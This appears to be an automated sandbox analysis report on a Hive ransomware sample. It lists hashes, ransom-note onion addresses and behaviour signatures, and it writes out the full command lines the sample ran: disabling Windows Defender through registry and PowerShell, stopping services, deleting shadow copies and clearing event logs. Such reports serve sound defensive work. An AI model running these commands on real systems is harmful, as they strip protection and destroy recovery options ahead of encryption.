Analysis
max time kernel: 163s
max time network: 126s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
Sample: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Resource: win7-en-20211208
General
Target: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Size: 3.1MB
MD5: f5d7efaec3c1274b0aaa704a6caa1671
SHA1: ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
SHA256: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
SHA512: dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
Malware Config
Extracted from: C:\Program Files\7-Zip\GyDM_HOW_TO_DECRYPT.txt
Family: hive
URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 1304)

Hive
A ransomware written in Golang, first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe
  Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies extensions of user files (20 IoCs)
Ransomware generally changes the extension on encrypted files.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1892)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  powershell.exe (PID 1340)
  powershell.exe (PID 1352)
  5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe (PID 1620)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe (PID 1620, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"
  - Modifies extensions of user files
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\net.exe (PID 656, level 2)
    Command line: net.exe stop "NetMsmqActivator" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 704, level 3)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  C:\Windows\SysWOW64\net.exe (PID 1640, level 2)
    Command line: net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1020, level 3)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y

  C:\Windows\SysWOW64\net.exe (PID 1148, level 2)
    Command line: net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1804, level 3)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y

  C:\Windows\SysWOW64\net.exe (PID 1952, level 2)
    Command line: net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 308, level 3)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y

  C:\Windows\SysWOW64\net.exe (PID 824, level 2)
    Command line: net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1056, level 3)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y

  C:\Windows\SysWOW64\net.exe (PID 660, level 2)
    Command line: net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1172, level 3)
      Command line: C:\Windows\system32\net1 stop "VSS" /y

  C:\Windows\SysWOW64\net.exe (PID 1112, level 2)
    Command line: net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1664, level 3)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y

  C:\Windows\SysWOW64\net.exe (PID 992, level 2)
    Command line: net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 988, level 3)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y

  C:\Windows\SysWOW64\sc.exe (PID 1812, level 2)
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 1712, level 2)
    Command line: sc.exe config "SamSs" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 1656, level 2)
    Command line: sc.exe config "SDRSVC" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 1624, level 2)
    Command line: sc.exe config "SstpSvc" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 1896, level 2)
    Command line: sc.exe config "UI0Detect" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 780, level 2)
    Command line: sc.exe config "VSS" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 1632, level 2)
    Command line: sc.exe config "wbengine" start= disabled
  C:\Windows\SysWOW64\sc.exe (PID 2000, level 2)
    Command line: sc.exe config "WebClient" start= disabled

  C:\Windows\SysWOW64\reg.exe (PID 1604, level 2)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SysWOW64\reg.exe (PID 328, level 2)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\SysWOW64\reg.exe (PID 704, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1984, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1064, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\SysWOW64\reg.exe (PID 972, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1440, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1100, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1192, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1664, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1028, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1704, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\SysWOW64\reg.exe (PID 1736, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\SysWOW64\reg.exe (PID 1748, level 2)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\SysWOW64\reg.exe (PID 1908, level 2)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\SysWOW64\reg.exe (PID 896, level 2)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1864
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1868
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1212
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1216
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1180
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1272
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1520
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1208
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:280
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:460
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1964
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:900
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1988
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:912
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1056 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1108
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1892 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:600 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1168
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1304 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1352
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 136df8aa392c6a628beedcf3fa5b77ef
  SHA1: b1358967b392b0066c22811f77833433e71da1ac
  SHA256: 2704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f
  SHA512: 44d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9